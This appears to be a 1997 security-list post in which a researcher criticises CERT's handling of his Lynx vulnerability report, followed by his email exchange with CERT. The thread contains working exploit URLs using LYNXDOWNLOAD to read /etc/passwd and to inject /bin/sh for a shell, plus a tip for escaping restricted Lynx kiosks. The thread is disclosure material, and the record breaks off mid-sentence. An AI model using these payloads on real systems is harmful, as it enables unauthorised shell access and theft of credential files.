Here's basically what happened (as i see it)
1) i told cert about it, they tried some crazy nonsensical things to get it
to work that the average unix user would know dont work.
2) they got the hole to work locally but they didnt appear to realize it was a
hole (and i thought security profs would)
3) they posted it to the lynx-dev list, which is open (i think), and by
doing that they released the hole to the public. (i thought that
cert was supposed to keep holes under wraps until they get them fixed)
4) they posted a VB that had a 'workaround' that didnt actually solve the
problem. (even if you cant 'g' to a URL you can still hit '?' or 'v'
depending on the version and if bookmarks are on and usually get to
yahoo. you can enter url tags at a yahoo seach prompt and force
a LYNXDOWNLOAD..) plus, i said that in the end of my first letter to
them.
Im really let down by CERT. From now on im posting straight to bugtraq.
To CERT: i told you about this hole. Without me, you wouldnt have known,
and the least you could do is get me the credit i deserved.
-------------------------------------------------------------------------------
>From dynamo@ime.net Thu Jul 17 22:52:48 1997
Date: Fri, 13 Jun 1997 13:57:01 -0400 (EDT)
From: dynamo@ime.net
To: cert@cert.org
Cc: brent@ime.net
Subject: Hello, I believe youll find this interesting.
I spoke to one of your people on the phone today, and she said pretty
much that if you provide info that you guys dont already have, that you
would give credit to the person who told you inside the advisory. with
that in mind, i would like to tell you about something ive noticed. it
related to universities and WAIS systems that use lynx in order to display
pages. if you feed lynx a url like:
LYNXDOWNLOAD://Method=-1/File=/etc/passwd/SugFile=/dev/stdin
on many systems it will show you their file, on a surprisingly large
number of systems there is now shadow. sometimes you cant use /dev/stdin
and you need your tty or some other place. now, because this calls
system() (i think.. i didnt check the source)
LYNXDOWNLOAD://Method=-1/File=;/bin/sh;/SugFile=/dev/stdin
also works and gives you a shell prompt. i believe that this is a real
problem for many universities out there.
Now, if someone cannot (g) to a random URL, they can
usually manuever to yahoo... and from there get a link redirector to go to
these sites in <a href="">a</a> format. Note: this pretty much makes
disallowing lynxexec: and file: as well as (g) useless.
Thanks,
dynamo
-------------------------------------------------------------------------------
>From cert@cert.org Thu Jul 17 22:50:34 1997
Date: Tue, 17 Jun 97 10:22:04 EDT
From: "CERT(R) Coordination Center" <cert@cert.org>
To: dynamo@ime.net
Cc: brent@ime.net, "CERT(R) Coordination Center" <cert@cert.org>
Subject: Re: Hello, I believe youll find this interesting. (INFO#97.19354)
-----BEGIN PGP SIGNED MESSAGE-----
Hi Dynamo,
<dynamo@ime.net> writes:
>pages. if you feed lynx a url like:
>LYNXDOWNLOAD://Method=-1/File=/etc/passwd/SugFile=/dev/stdin
>on many systems it will show you their file, on a surprisingly large
>number of systems there is now shadow. sometimes you cant use /dev/stdin
>and you need your tty or some other place. now, because this calls
>system() (i think.. i didnt check the source)
>LYNXDOWNLOAD://Method=-1/File=;/bin/sh;/SugFile=/dev/stdin
>also works and gives you a shell prompt. i believe that this is a real
>problem for many universities out there.
>Now, if someone cannot (g) to a random URL, they can
>usually manuever to yahoo... and from there get a link redirector to go to
>these sites in <a href="">a</a> format. Note: this pretty much makes
>disallowing lynxexec: and file: as well as (g) useless.
We tried both the of exploits that you discuss here, and we must be missing
something as we couldn't get either of them to work.
In the first case, what we did was attempt to attack the machine
"www.victim.example.com" from the machine "attacker.example.org" (note the
different domains - these are machine on separate networks).
attacker.example.org % lynx http://www.victim.example.com
{ and within lynx ... }
g
LYNXDOWNLOAD://Method=-1/File=/etc/passwd/SugFile=/dev/stdin
Enter a filename: /usr/users/attacker/tmp/foo
The file "/usr/users/attacker/tmp/foo" contains the password file from
attacker.example.org, not the password file from www.victim.example.com.
The next test we tried was to attack the local machine, to see if we could
read the /etc/shadow file:
attacker.example.org % lynx /etc/shadow
Alert!: Unable to access document.
lynx: Can't access start file file://localhost/{...}/etc/shadow
which would be expected since /etc/shadow is not world readable, and lynx
is not a setuid program.
attacker.example.org % lynx http://www.attacker.example.org
{ and within lynx ... }
g
LYNXDOWNLOAD://Method=-1/File=/etc/shadow/SugFile=/dev/stdin
Enter a filename: /usr/users/attacker/tmp/foo
-- press space for next page --/shadow: Permission denied
Finally, we tried the second exploit you gave above, and the terminal
froze with the following errors:
Saving.....cp: Insufficient arguments (0)
Arrow keys: Up and Down to move. Right Usage: cp [-f] [-i] [-p] f1 f2ack.
H)elp O)ptions P)rint G)o M)ain screen Q)uit /=search [delete]=history cp [-f] [-i] [-p] f1 ... fn d1
cp -r|R [-f] [-i] [-p] d1 ... dn-1 dn
(\!) \h \$
An attempt to use the second exploit with this modified operation:
LYNXDOWNLOAD://Method=-1/File=/dev/null;/bin/sh
also failed to produce a shell.
Is there some other part of the exploit that we have misunderstood? Thanks
for your report -- we look forward to any further pointers you may have.
Regards,
Rob.
| Rob McMillan Email: cert@cert.org
|| CERT Coordination Center (*) Phone: +1 (412) 268 7090 (24 x 7)
||| Software Engineering Institute Fax: +1 (412) 268 6989
|||| Carnegie Mellon University Web: http://www.cert.org
||||| Pittsburgh, Pa. 15213-3890 Timezone: GMT-5 (EST)
* CERT is registered with the U.S. Patent and Trademark Office. The Software
Engineering Institute is sponsored by the U.S. Department of Defense.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
iQCVAwUBM6anMHVP+x0t4w7BAQHTPQP9FMuNoaLRiwWEU/fTDyuOn6zOnjFZlFXc
x5yvnGSojfWuQBCmGn3HTVDk+Kf7h2T8igdWUPtim9UGOW6uyMk/z4z1W/m+mHQ7
Rb2uTDdEyy7wJCVtdd1UkEaDwovt4m8Jx4BeDbA7feycaL0m3ypfWVPaAPVr0Nu0
BH7fLzp0Iw8=
=+nB7
-----END PGP SIGNATURE-----
-------------------------------------------------------------------------------
>From dynamo@ime.net Thu Jul 17 22:53:09 1997
Date: Wed, 18 Jun 1997 21:38:54 -0400 (EDT)
From: dynamo@ime.net
To: "CERT(R) Coordination Center" <cert@cert.org>
Cc: brent@ime.net
Subject: Re: Hello, I believe youll find this interesting. (INFO#97.19354)
Well, first ive gotten it to work, Im currently away from my house right
now and dont have the machine name on me.. it was a [edited out] machine and i
emailed the person who runs it alreday. i grabbed this from the email i
had sent him.. ill give you a bigger list of affected boxes wheni get
back.
heres my screen capture:
[7mSaving.....
[K/bin/cp: missing file arguments
Try `/bin/cp --help' for more information.
bash$ bin dev lib proc tmp
vmlinuz
boot etc lost+found root usr zImage
cdrom home mnt sbin var zImage.mem
bash$
---------------
ill send you more info in a bit. this does work.
first off the file you select as sugfile must be writable if you do put
one in, second, all you ned to do is disable downloading and this problem
is fixed. i wouldnt have emailed you if it didnt work.
dynamo
-------------------------------------------------------------------------------
>From cert@cert.org Thu Jul 17 22:50:47 1997
Date: Thu, 19 Jun 97 17:39:43 EDT
From: "CERT(R) Coordination Center" <cert@cert.org>
To: dynamo@ime.net
Cc: brent@ime.net, "CERT(R) Coordination Center" <cert@cert.org>
Subject: Re: Hello, I believe youll find this interesting. (INFO#97.19354)
-----BEGIN PGP SIGNED MESSAGE-----
Hi,
First, thanks for the feedback.
<dynamo@ime.net> writes:
>Well, first ive gotten it to work, Im currently away from my house right
>now and dont have the machine name on me.. it was a [edited out] machine and i
>emailed the person who runs it alreday. i grabbed this from the email i
>had sent him.. ill give you a bigger list of affected boxes wheni get
>back.
>heres my screen capture:
>[7mSaving.....
>[K/bin/cp: missing file arguments
>Try `/bin/cp --help' for more information.
>
>bash$ bin dev lib proc tmp
>
>vmlinuz
>
>boot etc lost+found root usr zImage
>
>cdrom home mnt sbin var zImage.mem
>
>bash$
>---------------
>ill send you more info in a bit. this does work.
>first off the file you select as sugfile must be writable if you do put
>one in, second, all you ned to do is disable downloading and this problem
>is fixed. i wouldnt have emailed you if it didnt work.
Understood. We know that you wouldn't have sent us mail if you didn't have
something that you think was worthwhile and needed addressing. Since we've
been unable to replicate the problem that you are discussing, we want to
make sure that we are understanding what you are doing, so that we can
better understand the problem. We're glad that you took the time to advise
us in the first place; our aim is to better understand what you are saying
in case we are missing something.
We tried the exploits again, and were able to get a shell on the local
machine, but not on the remote machine.
Can you send us a typescript (using the "script" command) where you
replicate the problem, executing a "uname -a" on the local machine, and
then when you get a shell on the remote machine, execute a "uname -a" in
that shell? The typescript may show us something that you were doing that
we have missed.
Thanks again for any feedback.
Regards,
Rob.
| Rob McMillan Email: cert@cert.org
|| CERT Coordination Center (*) Phone: +1 (412) 268 7090 (24 x 7)
||| Software Engineering Institute Fax: +1 (412) 268 6989
|||| Carnegie Mellon University Web: http://www.cert.org
||||| Pittsburgh, Pa. 15213-3890 Timezone: GMT-5 (EST)
* CERT is registered with the U.S. Patent and Trademark Office. The Software
Engineering Institute is sponsored by the U.S. Department of Defense.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
iQCVAwUBM6mo8HVP+x0t4w7BAQES0gP+PQAb5JVwyn6Qmv18cVJLzpIlApTzkMoR
wqvsntnkZ62lIH/xTBnpyjSytbASuMhV9NRD/bc93rCtzjBBAhqAjjyMW0PoD65A
qouCYpOj4rcDmlmD1RjEEc3XAvwFiDKRXFzKnM/QCsXfIoLOg4tp2cNq6TFRS4nU
jdrXV6nDje8=
=tayo
-----END PGP SIGNATURE-----
-------------------------------------------------------------------------------
>From dynamo@ime.net Thu Jul 17 22:53:31 1997
Date: Sat, 21 Jun 1997 23:01:03 -0400 (EDT)
From: dynamo@ime.net
To: "CERT(R) Coordination Center" <cert@cert.org>
Cc: brent@ime.net
Subject: Re: Hello, I believe youll find this interesting. (INFO#97.19354)
Okay, now what i attached is something that i sent in email to the admin
of the box that it worked on.. as it worked by accident.. he didnt turn of
downloading like i emailed him that he should... in that case maybe he
didnt get it.. you may want to see if you can contact him.. ive tried
plenty of times and im sick of getting my mail bounced back.. after about
10 tries one didnt.. ANYWAY
its clearly a shell. note that i did not SEE my command line as i typed it
in, but after hitting enter it did execute. I know it works on a few
other Operating systems than lynx. but like i said.. the answer is just
disallowing downloading. i believe there are more internal URLs in lynx
that cause problems. i found this after doing a strings `which
lynx`|less.
so anyway, i hope you get the word out. for credit, "Aaron of Internet
Maine (ime.net)" would be great.
On Thu, 19 Jun 1997, CERT(R) Coordination Center wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
>
> Hi,
>
> First, thanks for the feedback.
>
> <dynamo@ime.net> writes:
> >Well, first ive gotten it to work, Im currently away from my house right
> >now and dont have the machine name on me.. it was a [edited out] machine and i
> >emailed the person who runs it alreday. i grabbed this from the email i
> >had sent him.. ill give you a bigger list of affected boxes wheni get
> >back.
> >heres my screen capture:
> >[7mSaving.....
> >[K/bin/cp: missing file arguments
> >Try `/bin/cp --help' for more information.
> >
> >bash$ bin dev lib proc tmp
> >
> >vmlinuz
> >
> >boot etc lost+found root usr zImage
> >
> >cdrom home mnt sbin var zImage.mem
> >
> >bash$
> >---------------
> >ill send you more info in a bit. this does work.
> >first off the file you select as sugfile must be writable if you do put
> >one in, second, all you ned to do is disable downloading and this problem
> >is fixed. i wouldnt have emailed you if it didnt work.
>
> Understood. We know that you wouldn't have sent us mail if you didn't have
> something that you think was worthwhile and needed addressing. Since we've
> been unable to replicate the problem that you are discussing, we want to
> make sure that we are understanding what you are doing, so that we can
> better understand the problem. We're glad that you took the time to advise
> us in the first place; our aim is to better understand what you are saying
> in case we are missing something.
>
> We tried the exploits again, and were able to get a shell on the local
> machine, but not on the remote machine.
>
> Can you send us a typescript (using the "script" command) where you
> replicate the problem, executing a "uname -a" on the local machine, and
> then when you get a shell on the remote machine, execute a "uname -a" in
> that shell? The typescript may show us something that you were doing that
> we have missed.
>
> Thanks again for any feedback.
>
> Regards,
> Rob.
>
> | Rob McMillan Email: cert@cert.org
> || CERT Coordination Center (*) Phone: +1 (412) 268 7090 (24 x 7)
> ||| Software Engineering Institute Fax: +1 (412) 268 6989
> |||| Carnegie Mellon University Web: http://www.cert.org
> ||||| Pittsburgh, Pa. 15213-3890 Timezone: GMT-5 (EST)
>
> * CERT is registered with the U.S. Patent and Trademark Office. The Software
> Engineering Institute is sponsored by the U.S. Department of Defense.
>
>
>
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
>
> iQCVAwUBM6mo8HVP+x0t4w7BAQES0gP+PQAb5JVwyn6Qmv18cVJLzpIlApTzkMoR
> wqvsntnkZ62lIH/xTBnpyjSytbASuMhV9NRD/bc93rCtzjBBAhqAjjyMW0PoD65A
> qouCYpOj4rcDmlmD1RjEEc3XAvwFiDKRXFzKnM/QCsXfIoLOg4tp2cNq6TFRS4nU
> jdrXV6nDje8=
> =tayo
> -----END PGP SIGNATURE-----
>
[Part 2, "" Text/PLAIN 40 lines]
[Unable to print this part]
-------------------------------------------------------------------------------
>From dynamo@ime.net Thu Jul 17 22:53:53 1997
Date: Sun, 22 Jun 1997 02:08:20 -0400 (EDT)
From: dynamo@ime.net
To: "CERT(R) Coordination Center" <cert@cert.org>
Cc: brent@ime.net
Subject: Re: Hello, I believe youll find this interesting. (INFO#97.19354)
On the same bug i was talking about...
Oh on another note.. what if someone did something like this: